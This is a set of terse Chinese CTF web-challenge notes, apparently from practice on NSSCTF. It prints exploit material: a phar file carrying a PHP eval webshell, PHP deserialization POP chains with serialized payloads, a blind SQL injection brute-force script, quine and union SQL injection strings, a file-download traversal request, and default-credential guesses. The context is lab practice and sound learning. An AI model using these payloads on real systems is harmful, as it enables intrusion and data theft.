[NISACTF 2022]bingdundun~

bingdundun处感觉像文件包含,改upload为index
发现确实,猜测会补一个后缀.php
那常规文件包含都不行了,这里还有一个文件上传的功能,考虑phar协议

<?php$phar = new Phar("test.phar");
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER();");
$phar->addFromString("test.php",'<?php eval($_GET[1]);?>');
$phar->stopBuffering();

生成的phar文件改后缀zip上传

[HDCTF 2023]Welcome To HDCTF 2023

死了也行直接给的

[NISACTF 2022]midlevel

Smarty ssti
感觉刚做过

[GKCTF 2020]cve版签到

[GXYCTF 2019]BabyUpload

.htaccess
常规的命令执行函数给ban了
用无参rce的方式读一下根目录的文件,看看flag叫什么

scandir(array_rand(array_flip(str_split(set_include_path(dirname(dirname(dirname(getcwd()))))))));
就叫flag,那直接读

[NSSCTF 2022 Spring Recruit]babyphp

[GDOUCTF 2023]EZ WEB

[NISACTF 2022]popchains

<?phpif(isset($_GET['wish'])){@unserialize($_GET['wish']);
}class Road_is_Long{public $page;public $string;public function __construct($file='index.php'){$this->page = $file;}public function __toString(){// 3return $this->string->page;}public function __wakeup(){if(preg_match("/file|ftp|http|https|gopher|dict|\.\./i", $this->page)) {// 4echo "You can Not Enter 2022";$this->page = "index.php";}}
}class Try_Work_Hard{protected  $var;public function __construct($var){$this -> var = $var;}public function append($value){// 0include($value);}public function __invoke(){$this->append($this->var);// 1}
}class Make_a_Change{public $effort;public function __construct(){$this->effort = array();}public function __get($key){// 2$function = $this->effort;return $function();}
}
$p = new Road_is_Long();
$R = new Road_is_Long();
$p -> page = $R;
$M = new Make_a_Change();
$R -> string = $M;
$T =new Try_Work_Hard('/flag');
$M -> effort = $T;
echo urlencode(serialize($p))."\n";

O%3A12%3A%22Road_is_Long%22%3A2%3A%7Bs%3A4%3A%22page%22%3BO%3A12%3A%22Road_is_Long%22%3A2%3A%7Bs%3A4%3A%22page%22%3Bs%3A9%3A%22index.php%22%3Bs%3A6%3A%22string%22%3BO%3A13%3A%22Make_a_Change%22%3A1%3A%7Bs%3A6%3A%22effort%22%3BO%3A13%3A%22Try_Work_Hard%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00var%22%3Bs%3A5%3A%22%2Fflag%22%3B%7D%7D%7Ds%3A6%3A%22string%22%3BN%3B%7D

[CISCN 2019华北Day2]Web1

import requestsurl = 'http://node2.anna.nssctf.cn:28640//index.php'flag = ''for i in range(1, 100):s = 33e = 130mid = (e + s)>>1while True:payload = {'id': 'if(ascii(substr((select(flag)from(flag)),{},1))>{},1,0)'.format(i, mid)}res = requests.post(url=url, data=payload).textif 'Hello, glzjin wants a girlfriend.' in res:s = midelse:e = midmid = (e + s)>>1if (e-s) <= 1:flag += chr(e)print(flag)breakif '}' in flag:break

[NSSRound#1 Basic]basic_check

无从下手,看wp是说允许PUT可以直接写马

[HCTF 2018]Warmup

[HNCTF 2022 Week1]2048

[LitCTF 2023]Http pro max plus

[GDOUCTF 2023]泄露的伪装

[HNCTF 2022 Week1]Interesting_include

[第五空间 2021]pklovecloud

<?php  
include 'flag.php';
class pkshow 
{  function echo_name()     {          return "Pk very safe^.^";      }  
} class acp 
{   protected $cinder;  public $neutron;public $nova;function __construct($p) {      $this->cinder = $p;}  function __toString()      {          if (isset($this->cinder))  return $this->cinder->echo_name();      }  
}  class ace
{    public $filename;     public $openstack;public $docker; public function __construct(){$this->filename = '../../../../../nssctfasdasdflag';}function echo_name()      {   $this->openstack = unserialize($this->docker);$this->openstack->neutron = $heat;if($this->openstack->neutron === $this->openstack->nova){$file = "./{$this->filename}";if (file_get_contents($file))         {              return file_get_contents($file); }  else { return "keystone lost~"; }    }}  
}$ACE = new ace();
$pop = new acp($ACE);echo urlencode(serialize($pop));

[鹤城杯 2021]Middle magic

[GKCTF 2021]easycms

弱口令 admin 12345

蝉知7.7网上找漏洞
然后尝试复现,我当时做的时候可以执行whoami,当时没做完干别的去了,过几天回来做又不能复现rce的漏洞了
那就和别人wp里写的一样任意文件下载

?m=ui&f=downloadtheme&theme=L2ZsYWc=

[SWPUCTF 2022 新生赛]ez_rce

getshell

直接读flag读不到
搜一下flag
find / -name "flag"

find / -name "flag" -type f -exec cat {} \;

[羊城杯 2020]easycon

base64解码得到flag

[LitCTF 2023]这是什么？SQL ！注一下 ！

-1))))))union select 1,group_concat(flag)from ctftraining.flag%23

[第五空间 2021]yet_another_mysql_injection

admin admin 爆hacker
然后我在这手工测了一会 没什么思路
右键看源码
然后跟进/?source

意思是传的password和查询的password要相同 quine注入

1'/**/union/**/select/**/replace(replace('1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#',char(34),char(39)),char(46),'1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#')#

看wp发现第二种做法
phpmyadmin
弱口令 admin admin

登录就行了